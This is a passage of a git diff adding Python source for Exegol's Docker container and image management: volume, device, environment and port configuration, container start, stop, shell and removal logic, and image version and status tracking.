+ """Get private volume path (None if not set)""" + if self.__workspace_custom_path: + return FsUtils.resolvStrPath(self.__workspace_custom_path) + elif self.__workspace_dedicated_path: + return FsUtils.resolvStrPath(self.__workspace_dedicated_path) + return "not found :(" + + def getPrivateVolumePath(self) -> str: + """Get private volume path (None if not set)""" + return FsUtils.resolvStrPath(self.__workspace_dedicated_path) + + def isSharedResourcesEnable(self) -> bool: + """Return if the feature 'shared resources' is enabled in this container config""" + return self.__shared_resources + + def isExegolResourcesEnable(self) -> bool: + """Return if the feature 'exegol resources' is enabled in this container config""" + return self.__exegol_resources + + def isGUIEnable(self) -> bool: + """Return if the feature 'GUI' is enabled in this container config""" + return self.__enable_gui + + def isTimezoneShared(self) -> bool: + """Return if the feature 'timezone' is enabled in this container config""" + return self.__share_timezone + + def isWorkspaceCustom(self) -> bool: + """Return if the workspace have a custom host volume""" + return bool(self.__workspace_custom_path) + + def addVolume(self, + host_path: str, + container_path: str, + read_only: bool = False, + volume_type: str = 'bind'): + """Add a volume to the container configuration""" + # The creation of the directory is ignored when it is a path to the remote drive + if volume_type == 'bind' and not host_path.startswith("\\\\"): + try: + os.makedirs(host_path, exist_ok=True) + except PermissionError: + logger.error("Unable to create the volume folder on the filesystem locally.") + logger.critical(f"Insufficient permissions to create the folder: {host_path}") + except FileExistsError: + # The volume targets a file that already exists on the file system + pass + mount = Mount(container_path, host_path, read_only=read_only, type=volume_type) + self.__mounts.append(mount) + + def addRawVolume(self, volume_string): 
+ """Add a volume to the container configuration from raw text input. + Expected format is: /source/path:/target/mount:rw""" + logger.debug(f"Parsing raw volume config: {volume_string}") + parsing = re.match(r'^((\w:)?([\\/][\w .,:\-|()&;]*)+):(([\\/][\w .,\-|()&;]*)+)(:(ro|rw))?$', + volume_string) + if parsing: + host_path = parsing.group(1) + container_path = parsing.group(4) + mode = parsing.group(7) + if mode is None or mode == "rw": + readonly = False + elif mode == "ro": + readonly = True + else: + logger.error(f"Error on volume config, mode: {mode} not recognized.") + readonly = False + logger.debug( + f"Adding a volume from '{host_path}' to '{container_path}' as {'readonly' if readonly else 'read/write'}") + self.addVolume(host_path, container_path, readonly) + else: + logger.critical(f"Volume '{volume_string}' cannot be parsed. Exiting.") + + def removeVolume(self, host_path: Optional[str] = None, container_path: Optional[str] = None) -> bool: + """Remove a volume from the container configuration (Only before container creation)""" + if host_path is None and container_path is None: + # This is a dev problem + raise ReferenceError('At least one parameter must be set') + for i in range(len(self.__mounts)): + # For each Mount object compare the host_path if supplied or the container_path si supplied + if host_path is not None and self.__mounts[i].get("Source") == host_path: + # When the right object is found, remove it from the list + self.__mounts.pop(i) + return True + if container_path is not None and self.__mounts[i].get("Target") == container_path: + # When the right object is found, remove it from the list + self.__mounts.pop(i) + return True + return False + + def getVolumes(self) -> List[Mount]: + """Volume config getter""" + return self.__mounts + + def addDevice(self, + device_source: str, + device_dest: Optional[str] = None, + readonly: bool = False, + mknod: bool = False): + """Add a device to the container configuration""" + if device_dest is 
None: + device_dest = device_source + perm = 'r' + if not readonly: + perm += 'w' + if mknod: + perm += 'm' + self.__devices.append(f"{device_source}:{device_dest}:{perm}") + + def removeDevice(self, device_source: str) -> bool: + """Remove a device from the container configuration (Only before container creation)""" + for i in range(len(self.__devices)): + # For each device, compare source device + if self.__devices[i].split(':')[0] == device_source: + # When found, remove it from the config list + self.__devices.pop(i) + return True + return False + + def getDevices(self) -> List[str]: + """Devices config getter""" + return self.__devices + + def addEnv(self, key: str, value: str): + """Add an environment variable to the container configuration""" + self.__envs[key] = value + + def removeEnv(self, key: str) -> bool: + """Remove an environment variable to the container configuration (Only before container creation)""" + try: + self.__envs.pop(key) + return True + except KeyError: + # When the Key is not present in the dictionary + return False + + def addRawEnv(self, env: str): + """Parse and add an environment variable from raw user input""" + env_args = env.split('=') + if len(env_args) < 2: + logger.critical(f"Incorrect env syntax ({env}). Please use this format: KEY=value") + key = env_args[0] + value = '='.join(env_args[1:]) + logger.debug(f"Adding env {key}={value}") + self.addEnv(key, value) + + def getEnvs(self) -> Dict[str, str]: + """Envs config getter""" + return self.__envs + + def getShellEnvs(self) -> List[str]: + """Overriding envs when opening a shell""" + result = [] + if self.__enable_gui: + current_display = GuiUtils.getDisplayEnv() + # If the default DISPLAY environment in the container is not the same as the DISPLAY of the user's session, + # the environment variable will be updated in the exegol shell. 
+ if current_display and self.__envs.get('DISPLAY', '') != current_display: + # This case can happen when the container is created from a local desktop + # but exegol can be launched from remote access via ssh with X11 forwarding + # (Be careful, an .Xauthority file may be needed). + result.append(f"DISPLAY={current_display}") + # TODO PATH common volume bin folder + # Overwrite env from user parameters + user_envs = ParametersManager().envs + if user_envs is not None: + for env in user_envs: + if len(env.split('=')) < 2: + logger.critical(f"Incorrect env syntax ({env}). Please use this format: KEY=value") + logger.debug(f"Add env to current shell: {env}") + result.append(env) + return result + + def getVpnName(self): + """Get VPN Config name""" + if self.__vpn_path is None: + return "[bright_black]N/A[/bright_black] " + return f"[deep_sky_blue3]{self.__vpn_path.name}[/deep_sky_blue3]" + + def addPort(self, + port_host: Union[int, str], + port_container: Union[int, str], + protocol: str = 'tcp', + host_ip: str = '0.0.0.0'): + """Add port NAT config, only applicable on bridge network mode.""" + if self.__network_host: + logger.warning( + "This container is configured to share the network with the host. You cannot open specific ports. 
Skipping.") + logger.warning("Please set network mode to bridge in order to expose specific network ports.") + return + if protocol.lower() not in ['tcp', 'udp', 'sctp']: + raise ProtocolNotSupported(f"Unknown protocol '{protocol}'") + self.__ports[f"{port_container}/{protocol}"] = (host_ip, int(port_host)) + + def getPorts(self) -> Dict[str, Optional[Union[int, Tuple[str, int], List[int]]]]: + """Ports config getter""" + return self.__ports + + def getTextFeatures(self, verbose: bool = False) -> str: + """Text formatter for features configurations (Privileged, GUI, Network, Timezone, Shares) + Print config only if they are different from their default config (or print everything in verbose mode)""" + result = "" + if verbose or self.__privileged: + result += f"{getColor(not self.__privileged)[0]}Privileged: {'On :fire:' if self.__privileged else '[green]Off :heavy_check_mark:[/green]'}{getColor(not self.__privileged)[1]}{os.linesep}" + if verbose or not self.__enable_gui: + result += f"{getColor(self.__enable_gui)[0]}GUI: {boolFormatter(self.__enable_gui)}{getColor(self.__enable_gui)[1]}{os.linesep}" + if verbose or not self.__network_host: + result += f"[green]Network mode: [/green]{'host' if self.__network_host else 'custom'}{os.linesep}" + if self.__vpn_path is not None: + result += f"[green]VPN: [/green]{self.getVpnName()}{os.linesep}" + if verbose or not self.__share_timezone: + result += f"{getColor(self.__share_timezone)[0]}Share timezone: {boolFormatter(self.__share_timezone)}{getColor(self.__share_timezone)[1]}{os.linesep}" + if verbose or not self.__exegol_resources: + result += f"{getColor(self.__exegol_resources)[0]}Exegol resources: {boolFormatter(self.__exegol_resources)}{getColor(self.__exegol_resources)[1]}{os.linesep}" + if verbose or not self.__shared_resources: + result += f"{getColor(self.__shared_resources)[0]}My resources: {boolFormatter(self.__shared_resources)}{getColor(self.__shared_resources)[1]}{os.linesep}" + return result.strip() + + 
def getTextMounts(self, verbose: bool = False) -> str: + """Text formatter for Mounts configurations. The verbose mode does not exclude technical volumes.""" + result = '' + for mount in self.__mounts: + # Blacklist technical mount + if not verbose and mount.get('Target') in ['/tmp/.X11-unix', '/opt/resources', '/etc/localtime', + '/etc/timezone', '/my-resources']: + continue + result += f"{mount.get('Source')} :right_arrow: {mount.get('Target')} {'(RO)' if mount.get('ReadOnly') else ''}{os.linesep}" + return result + + def getTextDevices(self, verbose: bool = False) -> str: + """Text formatter for Devices configuration. The verbose mode show full device configuration.""" + result = '' + for device in self.__devices: + if verbose: + result += f"{device}{os.linesep}" + else: + src, dest = device.split(':')[:2] + if src == dest: + result += f"{src}{os.linesep}" + else: + result += f"{src}:right_arrow:{dest}{os.linesep}" + return result + + def getTextEnvs(self, verbose: bool = False) -> str: + """Text formatter for Envs configuration. 
The verbose mode does not exclude technical variables.""" + result = '' + for k, v in self.__envs.items(): + # Blacklist technical variables, only shown in verbose + if not verbose and k in ["QT_X11_NO_MITSHM", "DISPLAY", "PATH"]: + continue + result += f"{k}={v}{os.linesep}" + return result + + def __str__(self): + """Default object text formatter, debug only""" + return f"Privileged: {self.__privileged}{os.linesep}" \ + f"Capabilities: {self.__capabilities}{os.linesep}" \ + f"Sysctls: {self.__sysctls}{os.linesep}" \ + f"X: {self.__enable_gui}{os.linesep}" \ + f"TTY: {self.tty}{os.linesep}" \ + f"Network host: {'host' if self.__network_host else 'custom'}{os.linesep}" \ + f"Share timezone: {self.__share_timezone}{os.linesep}" \ + f"Common resources: {self.__shared_resources}{os.linesep}" \ + f"Env ({len(self.__envs)}): {self.__envs}{os.linesep}" \ + f"Shares ({len(self.__mounts)}): {self.__mounts}{os.linesep}" \ + f"Devices ({len(self.__devices)}): {self.__devices}{os.linesep}" \ + f"VPN: {self.getVpnName()}" + + def printConfig(self): + """Log current object state, debug only""" + logger.info(f"Current container config :{os.linesep}{self}") diff --git a/exegol/model/ExegolContainer.py b/exegol/model/ExegolContainer.py new file mode 100644 index 00000000..58434084 --- /dev/null +++ b/exegol/model/ExegolContainer.py @@ -0,0 +1,226 @@ +import base64 +import os +import shutil +from typing import Optional, Dict, Sequence + +from docker.errors import NotFound +from docker.models.containers import Container + +from exegol.console.ExegolPrompt import Confirm +from exegol.console.cli.ParametersManager import ParametersManager +from exegol.model.ContainerConfig import ContainerConfig +from exegol.model.ExegolContainerTemplate import ExegolContainerTemplate +from exegol.model.ExegolImage import ExegolImage +from exegol.model.SelectableInterface import SelectableInterface +from exegol.utils.EnvInfo import EnvInfo +from exegol.utils.ExeLog import logger, console + + +class 
ExegolContainer(ExegolContainerTemplate, SelectableInterface): + """Class of an exegol container already create in docker""" + + def __init__(self, docker_container: Container, model: Optional[ExegolContainerTemplate] = None): + logger.debug(f"== Loading container : {docker_container.name}") + self.__container: Container = docker_container + self.__id: str = docker_container.id + self.__xhost_applied = False + if model is None: + # Create Exegol container from an existing docker container + super().__init__(docker_container.name, + config=ContainerConfig(docker_container), + image=ExegolImage(docker_image=docker_container.image)) + self.image.syncContainerData(docker_container) + self.__new_container = False + else: + # Create Exegol container from a newly created docker container with its object template. + super().__init__(docker_container.name, + config=ContainerConfig(docker_container), + # Rebuild config from docker object to update workspace path + image=model.image) + self.__new_container = True + self.image.syncStatus() + + def __str__(self): + """Default object text formatter, debug only""" + return f"{self.getRawStatus()} - {super().__str__()}" + + def __getState(self) -> Dict: + """Technical getter of the container status dict""" + self.__container.reload() + return self.__container.attrs.get("State", {}) + + def getRawStatus(self) -> str: + """Raw text getter of the container status""" + return self.__getState().get("Status", "unknown") + + def getTextStatus(self) -> str: + """Formatted text getter of the container status""" + status = self.getRawStatus().lower() + if status == "unknown": + return "Unknown" + elif status == "exited": + return "[red]Stopped" + elif status == "running": + return "[green]Running" + return status + + def isNew(self) -> bool: + """Check if the container has just been created or not""" + return self.__new_container + + def isRunning(self) -> bool: + """Check is the container is running. 
Return bool.""" + return self.getRawStatus() == "running" + + def getFullId(self) -> str: + """Container's id getter""" + return self.__id + + def getId(self) -> str: + """Container's short id getter""" + return self.__container.short_id + + def getKey(self) -> str: + """Universal unique key getter (from SelectableInterface)""" + return self.name + + def start(self): + """Start the docker container""" + if not self.isRunning(): + logger.info(f"Starting container {self.name}") + with console.status(f"Waiting to start {self.name}", spinner_style="blue"): + self.__container.start() + self.postStartSetup() + + def stop(self, timeout: int = 10): + """Stop the docker container""" + if self.isRunning(): + logger.info(f"Stopping container {self.name}") + with console.status(f"Waiting to stop ({timeout}s timeout)", spinner_style="blue"): + self.__container.stop(timeout=timeout) + + def spawnShell(self): + """Spawn a shell on the docker container""" + logger.info(f"Location of the exegol workspace on the host : {self.config.getHostWorkspacePath()}") + for device in self.config.getDevices(): + logger.info(f"Shared host device: {device.split(':')[0]}") + logger.success(f"Opening shell in Exegol '{self.name}'") + # In case of multi-user environment, xhost must be set before opening each session to be sure + self.__applyXhostACL() + # Using system command to attach the shell to the user terminal (stdin / stdout / stderr) + envs = self.config.getShellEnvs() + options = "" + if len(envs) > 0: + options += f" -e {' -e '.join(envs)}" + cmd = f"docker exec{options} -ti {self.getFullId()} {ParametersManager().shell}" + logger.debug(f"Opening shell with: {cmd}") + os.system(cmd) + # Docker SDK doesn't support (yet) stdin properly + # result = self.__container.exec_run(ParametersManager().shell, stdout=True, stderr=True, stdin=True, tty=True, + # environment=self.config.getShellEnvs()) + # logger.debug(result) + + def exec(self, command: Sequence[str], as_daemon: bool = True, quiet: 
bool = False): + """Execute a command / process on the docker container""" + if not self.isRunning(): + self.start() + if not quiet: + logger.info("Executing command on Exegol") + if logger.getEffectiveLevel() > logger.VERBOSE and not ParametersManager().daemon: + logger.info("Hint: use verbose mode to see command output (-v).") + cmd = self.formatShellCommand(command, quiet) + stream = self.__container.exec_run(cmd, detach=as_daemon, stream=not as_daemon) + if as_daemon and not quiet: + logger.success("Command successfully executed in background") + else: + try: + # stream[0] : exit code + # stream[1] : text stream + for log in stream[1]: + logger.raw(log.decode("utf-8")) + if not quiet: + logger.success("End of the command") + except KeyboardInterrupt: + if not quiet: + logger.info("Detaching process logging") + logger.warning("Exiting this command does NOT stop the process in the container") + + @staticmethod + def formatShellCommand(command: Sequence[str], quiet: bool = False): + """Generic method to format a shell command and support zsh aliases""" + # Using base64 to escape special characters + str_cmd = ' '.join(command) + if not quiet: + logger.success(f"Command received: {str_cmd}") + cmd_b64 = base64.b64encode(str_cmd.encode('utf-8')).decode('utf-8') + # Load zsh aliases and call eval to force aliases interpretation + cmd = f'zsh -c "source /opt/.zsh_aliases; eval $(echo {cmd_b64} | base64 -d)"' + logger.debug(f"Formatting zsh command: {cmd}") + return cmd + + def remove(self): + """Stop and remove the docker container""" + self.__removeVolume() + self.stop(timeout=2) + logger.info(f"Removing container {self.name}") + try: + self.__container.remove() + logger.success(f"Container {self.name} successfully removed.") + except NotFound: + logger.error( + f"The container {self.name} has already been removed (probably created as a temporary container).") + + def __removeVolume(self): + """Remove private workspace volume directory if exist""" + volume_path = 
self.config.getPrivateVolumePath() + # TODO add backup + if volume_path != '': + if volume_path.startswith('/wsl/') or volume_path.startswith('\\wsl\\'): + # Docker volume defines from WSL don't return the real path, they cannot be automatically removed + # TODO review WSL workspace volume + logger.warning("Warning: WSL workspace directory cannot be removed automatically.") + return + logger.verbose("Removing workspace volume") + logger.debug(f"Removing volume {volume_path}") + try: + is_file_present = os.listdir(volume_path) + except PermissionError: + if Confirm(f"Insufficient permission to view workspace files {volume_path}, " + f"do you still want to delete them?", default=False): + # Set is_file_present as false to skip user prompt again + is_file_present = False + else: + return + try: + if is_file_present: + # Directory is not empty + if not Confirm(f"Workspace [magenta]{volume_path}[/magenta] is not empty, do you want to delete it?", + default=False): + # User can choose not to delete the workspace on the host + return + # Try to remove files from the host with user permission (work only without sub-directory) + shutil.rmtree(volume_path) + except PermissionError: + logger.info(f"Deleting the workspace files from the [green]{self.name}[/green] container as root") + # If the host can't remove the container's file and folders, the rm command is exec from the container itself as root + self.exec(["rm", "-rf", "/workspace"], as_daemon=False, quiet=True) + try: + shutil.rmtree(volume_path) + except PermissionError: + logger.warning(f"I don't have the rights to remove [magenta]{volume_path}[/magenta] (do it yourself)") + return + except Exception as err: + logger.error(err) + return + logger.success("Private workspace volume removed successfully") + + def postStartSetup(self): + self.__applyXhostACL() + + def __applyXhostACL(self): + # If GUI is enabled, allow X11 access on host ACL (if not already allowed) + # + X11 GUI on Windows host don't need xhost command + 
if self.config.isGUIEnable() and not self.__xhost_applied and not EnvInfo.isWindowsHost(): + self.__xhost_applied = True # Can be applied only once per execution + logger.debug(f"Adding xhost ACL to local:{self.hostname}") + os.system(f"xhost +local:{self.hostname} > /dev/null") diff --git a/exegol/model/ExegolContainerTemplate.py b/exegol/model/ExegolContainerTemplate.py new file mode 100644 index 00000000..cdb72469 --- /dev/null +++ b/exegol/model/ExegolContainerTemplate.py @@ -0,0 +1,28 @@ +import os +from typing import Optional + +from rich.prompt import Prompt + +from exegol.model.ContainerConfig import ContainerConfig +from exegol.model.ExegolImage import ExegolImage + + +class ExegolContainerTemplate: + """Exegol template class used to create a new container""" + + def __init__(self, name: Optional[str], config: ContainerConfig, image: ExegolImage): + if name is None: + name = Prompt.ask("[bold blue][?][/bold blue] Enter the name of your new exegol container", default="default") + assert name is not None + self.name: str = name.replace('exegol-', '') + self.hostname: str = name if name.startswith("exegol-") else f'exegol-{name}' + self.image: ExegolImage = image + self.config: ContainerConfig = config + + def __str__(self): + """Default object text formatter, debug only""" + return f"{self.name} - {self.image.getName()}{os.linesep}{self.config}" + + def prepare(self): + """Prepare the model before creating the docker container""" + self.config.prepareShare(self.name) diff --git a/exegol/model/ExegolImage.py b/exegol/model/ExegolImage.py new file mode 100644 index 00000000..b896d4d6 --- /dev/null +++ b/exegol/model/ExegolImage.py @@ -0,0 +1,502 @@ +from datetime import datetime +from typing import Optional, List + +from docker.models.containers import Container +from docker.models.images import Image + +from exegol.model.SelectableInterface import SelectableInterface +from exegol.utils.ConstantConfig import ConstantConfig +from exegol.utils.ExeLog import 
logger + + +class ExegolImage(SelectableInterface): + """Class of an exegol image. Container every information about the docker image.""" + + def __init__(self, + name: str = "NONAME", + digest: Optional[str] = None, + image_id: Optional[str] = None, + size: int = 0, + docker_image: Optional[Image] = None, + isUpToDate: bool = False): + """Docker image default value""" + # Init attributes + self.__image: Image = docker_image + self.__name: str = name + self.__alt_name: str = '' + self.__version_specific: bool = "-" in name + # Latest version available of the current image (or current version if version specific) + self.__profile_version: str = '-'.join(name.split('-')[1:]) if self.isVersionSpecific() else \ + "[bright_black]N/A[/bright_black]" + # Version of the docker image installed + self.__image_version: str = self.__profile_version + # This mode allows to know if the version has been retrieved from the tag and is part of the image name or + # if it is retrieved from the tags (ex: nightly) + self.__version_label_mode: bool = False + self.__build_date = "[bright_black]N/A[/bright_black]" + # Remote image size + self.__dl_size: str = "[bright_black]N/A[/bright_black]" if size == 0 else self.__processSize(size) + # Local uncompressed image's size + self.__disk_size: str = "[bright_black]N/A[/bright_black]" + # Remote image ID + self.__digest: str = "[bright_black]N/A[/bright_black]" + # Local docker image ID + self.__image_id: str = "[bright_black]Not installed[/bright_black]" + # Status + self.__is_remote: bool = size > 0 + self.__is_install: bool = False + self.__is_update: bool = isUpToDate + self.__is_discontinued: bool = False + # The latest version is merged with the latest one, every other version is old and must be removed + self.__outdated: bool = self.__version_specific + self.__custom_status: str = "" + # Process data + if docker_image is not None: + self.__initFromDockerImage() + else: + self.__setDigest(digest) + self.__setImageId(image_id) + 
logger.debug("└── {}\t→ ({}) {}".format(self.__name, self.getType(), self.__digest)) + + def __initFromDockerImage(self): + """Parse Docker object to set up self configuration on creation.""" + # If docker object exists, image is already installed + self.__is_install = True + # Set init values from docker object + if len(self.__image.attrs["RepoTags"]) > 0: + # Tag as outdated until the latest tag is found + self.__outdated = True + name = self.__name # Init with old name + self.__name = None + for repo_tag in self.__image.attrs["RepoTags"]: + repo, name = repo_tag.split(':') + if not repo.startswith(ConstantConfig.IMAGE_NAME): + # Ignoring external images (set container using external image as outdated) + continue + # Check if a non-version tag (the latest tag) is supplied, if so, this image must NOT be removed + if "-" not in name: + self.__outdated = False + self.__name = name + else: + self.__setImageVersion('-'.join(name.split('-')[1:])) + + # if no version has been found, restoring previous name + if self.__name is None: + self.__name = name + + self.__version_specific = "-" in self.__name + if self.isVersionSpecific(): + self.__profile_version = '-'.join(name.split('-')[1:]) + self.__setImageVersion(self.__profile_version) + else: + # If tag is , try to find labels value, if not set fallback to default value + self.__name = self.__image.labels.get("org.exegol.tag", "") + self.__outdated = True + self.__version_specific = True + self.__setRealSize(self.__image.attrs["Size"]) + # Set build date from labels + self.__build_date = self.__image.labels.get('org.exegol.build_date', '[bright_black]N/A[/bright_black]') + # Set local image ID + self.__setImageId(self.__image.attrs["Id"]) + # If this image is remote, set digest ID + self.__is_remote = len(self.__image.attrs["RepoDigests"]) > 0 + if self.__is_remote: + self.__setDigest(self.__parseDigest(self.__image)) + self.__labelVersionParsing() + # Default status, must be refreshed if some parameters are change 
externally + self.syncStatus() + + def __labelVersionParsing(self): + """Fallback version parsing using image's label (if exist). + This method can only be used if version has not been provided from the image's tag.""" + if "N/A" in self.__image_version: + version_label = self.__image.labels.get("org.exegol.version") + if version_label is not None: + self.__setImageVersion(version_label, source_tag=False) + + def syncStatus(self): + """When the image is loaded from a docker object, docker repository metadata are not present. + It's not (yet) possible to know if the current image is up-to-date.""" + if "N/A" in self.__profile_version and not self.isLocal() and not self.isUpToDate() and not self.__is_discontinued and not self.__outdated: + # TODO find if up-to-date (direct docker load) must check with repo (or DockerUtils cache / DockerHubUtils) + self.__custom_status = "[bright_black]Unknown[/bright_black]" + else: + self.__custom_status = "" + + def syncContainerData(self, container: Container): + """Synchronization between the container and the image. + If the image has been updated, the tag is lost, + but it is saved in the properties of the container that still uses it.""" + if self.isLocked(): + original_name = container.attrs["Config"]["Image"].split(":")[1] + if self.__name == 'NONAME': + self.__name = original_name + self.__version_specific = "-" in self.__name + self.__alt_name = f'{original_name} [bright_black](outdated' \ + f'{f" v.{self.getImageVersion()}" if "N/A" not in self.getImageVersion() else ""})[/bright_black]' + + def updateCheck(self) -> Optional[str]: + """If this image can be updated, return its name, otherwise return None""" + if self.__is_remote: + if self.__is_update: + logger.warning("This image is already up to date. 
Skipping.") + return None + return self.__name + else: + logger.error("Local images cannot be updated.") + return None + + def isUpToDate(self) -> bool: + if not self.__is_remote: + return True # Local image cannot be updated + return self.__is_update + + def removeCheck(self) -> Optional[str]: + """If this image can be removed, return its name, otherwise return None""" + if self.__is_install: + return self.__name + else: + logger.error("This image is not installed locally. Skipping.") + return None + + def setDockerObject(self, docker_image: Image): + """Docker object setter. Parse object to set up self configuration.""" + self.__image = docker_image + # When a docker image exist, image is locally installed + self.__is_install = True + # Set real size on disk + self.__setRealSize(self.__image.attrs["Size"]) + # Set local image ID + self.__setImageId(docker_image.attrs["Id"]) + # Set build date from labels + self.__build_date = self.__image.labels.get('org.exegol.build_date', '[bright_black]N/A[/bright_black]') + # Check if local image is sync with remote digest id (check up-to-date status) + self.__is_update = self.__digest == self.__parseDigest(docker_image) + # Add version tag (if available) + for repo_tag in docker_image.attrs["RepoTags"]: + tmp_name, tmp_tag = repo_tag.split(':') + if tmp_name == ConstantConfig.IMAGE_NAME and "-" in tmp_tag: + self.__setImageVersion('-'.join(tmp_tag.split('-')[1:])) + # backup plan: Use label to retrieve image version + self.__labelVersionParsing() + + @classmethod + def __mergeCommonImages(cls, images: List['ExegolImage']): + """Select latest images and merge them with their version's specific equivalent (installed and/or latest).""" + latest_images, version_images = [], [] + # Splitting images by type : latest or version specific + for img in images: + if '-' in img.getName(): + version_images.append(img) + else: + latest_images.append(img) + + # Test each combination + for main_image in latest_images: + for version_specific 
in version_images: + match = False + if main_image.getRemoteId() == version_specific.getRemoteId(): + # Set exact profile version to the remaining latest image + main_image.__setLatestVersion(version_specific.getImageVersion()) + match = True + # Try to find a matching version (If 2 local id images are the same, this version is actually installed as latest) + if main_image.isInstall() and main_image.getLocalId() == version_specific.getLocalId(): + # Set version to the remaining latest image + main_image.__setImageVersion(version_specific.getImageVersion()) + match = True + if match: + try: + # Remove duplicates image from the result array (don't need to be returned, same object) + images.remove(version_specific) + except ValueError: + # already been removed + pass + + @classmethod + def mergeImages(cls, remote_images: List['ExegolImage'], local_images: List[Image]) -> List['ExegolImage']: + """Compare and merge local images and remote images. + Use case to process : + - up-to-date : "Version specific" image can use exact digest_id matching. 
Latest image must match corresponding tag + - outdated : Don't match digest_id but match (latest) tag + - local image : don't have any 'RepoDigests' because they are local + - discontinued : image with 'RepoDigests' properties but not found in remote + - unknown : no internet connection = no information from the registry + - not install : other remote images without any match + Return a list of ExegolImage.""" + results = [] + # build data + local_data = {} + for local_img in local_images: + # Check if custom local build + if len(local_img.attrs["RepoDigests"]) == 0: + # This image is build locally + new_image = ExegolImage(docker_image=local_img) + results.append(new_image) + continue + # find digest id + digest = local_img.attrs["RepoDigests"][0].split('@')[1] + for digest_id in local_img.attrs["RepoDigests"]: + if digest_id.startswith(ConstantConfig.IMAGE_NAME): # Find digest id from the right repository + digest = digest_id.split('@')[1] + break + # Load variables - find current image tags + names: List[str] = [] + tags: List[str] = [] + # handle tag + if len(local_img.attrs["RepoTags"]) > 0: + for repo_tag in local_img.attrs["RepoTags"]: + tmp_name, tmp_tag = repo_tag.split(':') + # Selecting tags from the good repository + filtering out version tag (handle by digest_id earlier) + if tmp_name == ConstantConfig.IMAGE_NAME and "-" not in tmp_tag: + names.append(tmp_name) + tags.append(tmp_tag) + # Temporary data structure + local_data[digest] = {"tags": tags, "image": local_img, "match": False} + + for current_image in remote_images: + for digest, data in local_data.items(): + # Same digest id = up-to-date + if current_image.getRemoteId() == digest: + current_image.setDockerObject(data["image"]) # Handle up-to-date, version specific + data["match"] = True + if current_image.isVersionSpecific(): # If the image is latest, tag must be also check + break + # if latest mode, must match with tag (to find already installed outdated version) + for tag in 
data.get('tags', []): + # Check if the tag is matching and + if current_image.getName() == tag and not current_image.isUpToDate(): + current_image.setDockerObject( + data["image"]) # Handle latest image matching (up-to-date / outdated) + data["match"] = True + # If remote image don't find any match, fallback to default => not installed + + results.extend(remote_images) # Every remote images is kept (even if not installed) + + for data in local_data.values(): + if not data["match"]: + # Matching image not found - there is no match with remote image list + new_image = ExegolImage(docker_image=data["image"]) + if len(remote_images) == 0: + # If there are no remote images left, the user probably doesn't have internet and can't know the status of the images from the registry + new_image.setCustomStatus("[bright_black]Unknown[/bright_black]") + else: + # If there are still remote images but the image has not found any match it is because it has been deleted/discontinued + new_image.__is_discontinued = True + # Discontinued image can no longer be updated + new_image.__is_update = True + # Status must be updated after changing previous criteria + new_image.syncStatus() + results.append(new_image) + + cls.__mergeCommonImages(results) + return results + + @classmethod + def reorderImages(cls, images: List['ExegolImage']) -> List['ExegolImage']: + """Reorder ExegolImages depending on their status""" + uptodate, outdated, local_build, deprecated = [], [], [], [] + for img in images.copy(): + # First up-to-date + if img.isUpToDate(): + uptodate.append(img) # The current image if added to the corresponding groups + images.remove(img) # and is removed from the pool (last image without any match will be last) + # Second need upgrade + elif (not img.isLocal()) and img.isInstall(): + outdated.append(img) + images.remove(img) + # Third local + elif img.isLocal(): + local_build.append(img) + images.remove(img) + # Fourth deprecated + elif img.isLocked() and img.isInstall(): + 
deprecated.append(img) + images.remove(img) + # apply images order + result = uptodate + outdated + local_build + deprecated + # then not installed & other + result.extend(images) # Adding left images + return result + + @staticmethod + def __processSize(size: int, precision: int = 1) -> str: + """Text formatter from size number to human-readable size.""" + # https://stackoverflow.com/a/32009595 + suffixes = ["B", "KB", "MB", "GB", "TB"] + suffix_index = 0 + calc: float = size + while calc > 1024 and suffix_index < 4: + suffix_index += 1 # increment the index of the suffix + calc = calc / 1024 # apply the division + return "%.*f%s" % (precision, calc, suffixes[suffix_index]) + + def __eq__(self, other): + """Operation == overloading for ExegolImage object""" + # How to compare two ExegolImage + if type(other) is ExegolImage: + return self.__name == other.__name and self.__digest == other.__digest + # How to compare ExegolImage with str + elif type(other) is str: + return self.__name == other + else: + logger.error(f"Error, {type(other)} compare to ExegolImage is not implemented") + raise NotImplementedError + + def __str__(self): + """Default object text formatter, debug only""" + return f"{self.__name} ({self.__image_version}/{self.__profile_version}) - {self.__disk_size} - " + \ + (f"({self.getStatus()}, {self.__dl_size})" if self.__is_remote else f"{self.getStatus()}") + + def setCustomStatus(self, status: str): + """Manual image's status overwrite""" + self.__custom_status = status + + def getStatus(self, include_version: bool = True) -> str: + """Formatted text getter of image's status. + Parameter include_version allow choosing if the image version must be printed or not. + When image version is already print in the user context, no need to duplicate the information. 
+ The status update available always print his version because the latest version is not print elsewhere.""" + image_version = '' if (not include_version) or 'N/A' in self.getImageVersion() else f' (v.{self.getImageVersion()})' + if self.__custom_status != "": + return self.__custom_status + elif not self.__is_remote: + return "[blue]Local image[/blue]" + elif self.__outdated and self.__is_install: + return f"[orange3]Outdated{image_version}[/orange3]" + elif self.__is_discontinued: + return "[red]Discontinued[/red]" + elif self.__is_update: + return f"[green]Up to date{image_version}[/green]" + elif self.__is_install: + return f"[orange3]Update available" \ + f"{'' if 'N/A' in self.getLatestVersion() else f' (v.{self.getImageVersion()} :arrow_right: v.{self.getLatestVersion()})'}[/orange3]" + else: + return "[bright_black]Not installed[/bright_black]" + + def getType(self) -> str: + """Image type getter""" + return "remote" if self.__is_remote else "local" + + def __setDigest(self, digest: Optional[str]): + """Remote image digest setter""" + if digest is not None: + self.__digest = digest + + @staticmethod + def __parseDigest(docker_image: Image) -> str: + """Parse the remote image digest ID. 
+ Return digest id from the docker object.""" + for digest_id in docker_image.attrs["RepoDigests"]: + if digest_id.startswith(ConstantConfig.IMAGE_NAME): # Find digest id from the right repository + return digest_id.split('@')[1] + return "" + + def getRemoteId(self) -> str: + """Remote digest getter""" + return self.__digest + + def __setImageId(self, image_id: Optional[str]): + """Local image id setter""" + if image_id is not None: + self.__image_id = image_id.split(":")[1][:12] + + def getLocalId(self) -> str: + """Local id getter""" + return self.__image_id + + def getKey(self) -> str: + """Universal unique key getter (from SelectableInterface)""" + return self.getName() + + def __setRealSize(self, value: int): + """On-Disk image size setter""" + self.__disk_size = self.__processSize(value) + + def getRealSize(self) -> str: + """On-Disk size getter""" + return self.__disk_size + + def getDownloadSize(self) -> str: + """Remote size getter""" + if not self.__is_remote: + return "local" + return self.__dl_size + + def getSize(self) -> str: + """Image size getter. If the image is installed, return the on-disk size, otherwise return the remote size""" + return self.__disk_size if self.__is_install else f"{self.__dl_size} [bright_black](compressed)[/bright_black]" + + def getBuildDate(self): + """Build date getter""" + if "N/A" not in self.__build_date: 